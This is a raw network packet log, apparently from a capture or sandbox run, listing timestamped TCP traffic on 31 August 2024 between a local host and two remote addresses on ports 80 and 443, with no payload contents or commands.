                                                      Aug 31, 2024 15:50:58.600872993 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600912094 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.601166964 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.605952024 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.606014967 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.606214046 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.606214046 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.617969990 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.691359997 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.691427946 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.691473007 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.691488981 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.691514969 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.691526890 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.691586018 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.691597939 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.691610098 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.691618919 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.691631079 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.691633940 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.691648960 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.691668987 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.692399025 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.692411900 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.692421913 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.692431927 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.692439079 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.692447901 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.692454100 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.692476034 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.692492008 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.693227053 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.693238020 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.693257093 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.693267107 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.693278074 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.693279028 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.693286896 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.693300009 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.693310976 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.694118023 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.694128990 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.694139004 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.694150925 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.694160938 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.694173098 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.694188118 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.696249962 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.696264029 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.696293116 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.696327925 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.782253981 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782269955 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782288074 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782298088 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782309055 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782310963 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.782320976 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782325983 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.782340050 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.782349110 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.782670975 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782706976 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.782721996 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782732964 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782769918 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.782769918 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.782790899 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782799959 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782810926 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782820940 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.782838106 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.782847881 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.783591032 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.783627987 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.783698082 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.783709049 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.783718109 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.783727884 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.783730984 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.783739090 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.783749104 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.783750057 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.783761978 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.783771992 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.783782005 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.784558058 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.784568071 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.784584999 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.784595013 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.784595966 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.784605980 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.784610033 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.784615993 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.784622908 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.784626961 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.784641027 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.784652948 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.785465956 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.785501003 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.785507917 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.785517931 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.785537004 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.785567045 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.785584927 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.785594940 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.785604954 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.785614967 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.785638094 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.785654068 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.785682917 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.998373985 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003504038 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003520012 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003530979 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003540993 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003551960 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003551960 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003561974 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003573895 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003575087 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003597021 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003617048 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003617048 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003618002 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003628969 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003638983 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003649950 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003658056 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003720999 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003720999 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003818035 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003957987 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.003957987 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003969908 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003981113 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.003990889 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.004003048 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:59.004035950 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.004035950 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.004035950 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.004106998 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:59.237207890 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:50:59.237236977 CEST44349163208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:50:59.237287998 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:50:59.242403030 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:50:59.242413998 CEST44349163208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:50:59.769503117 CEST44349163208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:50:59.769723892 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:50:59.775847912 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:50:59.775861025 CEST44349163208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:50:59.776171923 CEST44349163208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:50:59.776218891 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:50:59.898603916 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:50:59.944509029 CEST44349163208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:00.034111023 CEST44349163208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:00.034207106 CEST44349163208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:00.034254074 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:00.034650087 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:00.039585114 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:00.039608002 CEST44349163208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:00.039625883 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:00.039655924 CEST49163443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:00.327291012 CEST49164443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:00.327336073 CEST44349164208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:00.327398062 CEST49164443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:00.327862978 CEST49164443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:00.327879906 CEST44349164208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:01.223907948 CEST44349164208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:01.223968983 CEST49164443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:01.229120970 CEST49164443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:01.229137897 CEST44349164208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:01.229459047 CEST44349164208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:01.232328892 CEST49164443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:01.276494980 CEST44349164208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:01.629225016 CEST44349164208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:01.629302025 CEST44349164208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:01.629354000 CEST49164443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:01.629421949 CEST49164443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:01.629443884 CEST44349164208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:03.726533890 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:51:03.726615906 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:51:04.821918964 CEST49165443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:04.821949005 CEST44349165208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:04.822017908 CEST49165443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:04.822503090 CEST49165443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:04.822515011 CEST44349165208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:07.642735004 CEST44349165208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:07.642863989 CEST49165443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:07.646728992 CEST49165443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:07.646739006 CEST44349165208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:07.647044897 CEST44349165208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:07.660651922 CEST49165443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:07.708512068 CEST44349165208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:10.190113068 CEST44349165208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:10.190192938 CEST44349165208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:10.190370083 CEST49165443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:10.190495968 CEST49165443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:10.190516949 CEST44349165208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:10.347271919 CEST49166443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:10.347305059 CEST44349166208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:10.347376108 CEST49166443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:10.347645044 CEST49166443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:10.347656965 CEST44349166208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:11.183319092 CEST44349166208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:11.183396101 CEST49166443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:11.187927961 CEST49166443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:11.187939882 CEST44349166208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:11.188235998 CEST44349166208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:11.189228058 CEST49166443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:51:11.236494064 CEST44349166208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:51:11.389113903 CEST44349166208.64.171.230192.168.2.22
Aug 31, 2024 15:51:11.389206886 CEST  443    49166  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:11.389293909 CEST  49166  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:11.389904976 CEST  49166  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:11.389929056 CEST  443    49166  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:11.401634932 CEST  49167  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:11.401679039 CEST  443    49167  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:11.401778936 CEST  49167  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:11.401995897 CEST  49167  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:11.402009010 CEST  443    49167  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:11.955528975 CEST  443    49167  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:11.956080914 CEST  49167  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:11.956101894 CEST  443    49167  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:11.956733942 CEST  49167  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:11.956738949 CEST  443    49167  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.112687111 CEST  443    49167  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.112756968 CEST  443    49167  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.112937927 CEST  49167  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.113101959 CEST  49167  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.113127947 CEST  443    49167  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.231077909 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.231132030 CEST  443    49168  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.231194019 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.231548071 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.231558084 CEST  443    49168  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.772958994 CEST  443    49168  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.773320913 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.774827003 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.774840117 CEST  443    49168  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.776619911 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.776629925 CEST  443    49168  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.981034040 CEST  443    49168  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.981111050 CEST  443    49168  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.981189013 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.981209040 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.983030081 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.983042955 CEST  443    49168  208.64.171.230  192.168.2.22
Aug 31, 2024 15:51:12.983076096 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.983119011 CEST  49168  443    192.168.2.22    208.64.171.230
Aug 31, 2024 15:51:12.987169981 CEST  49169  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:12.992285013 CEST  80     49169  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:12.992363930 CEST  49169  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:12.993789911 CEST  49169  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:12.998552084 CEST  80     49169  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:13.479738951 CEST  80     49169  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:13.479934931 CEST  49169  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:13.758228064 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:13.763264894 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:13.763427973 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:13.763609886 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:13.768361092 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246581078 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246601105 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246613026 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246623993 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246634960 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246644020 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246649027 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246659994 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246673107 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246669054 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.246681929 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.246707916 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.246707916 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.246722937 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.251570940 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.251584053 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.251595974 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.251605988 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.251666069 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.253216028 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.261734962 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.261815071 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522362947 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522377968 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522403955 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522419930 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522424936 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522429943 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522435904 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522445917 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522455931 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522460938 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522465944 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522466898 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522475958 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522480011 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522485018 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522486925 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522489071 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522501945 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522517920 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522521019 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522526026 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522530079 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522538900 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522548914 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522551060 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522557020 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522557020 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522567987 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522576094 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522581100 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522581100 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522589922 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522591114 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522598982 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522600889 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522608995 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522614002 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522618055 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522627115 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.522627115 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522654057 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522682905 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.522682905 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.527662039 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.527673960 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.527683973 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.527693987 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.527733088 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.527899981 CEST  80     49170  23.94.148.16    192.168.2.22
Aug 31, 2024 15:51:14.527930975 CEST  49170  80     192.168.2.22    23.94.148.16
Aug 31, 2024 15:51:14.527930975 CEST  49170  80     192.168.2.22    23.94.148.16
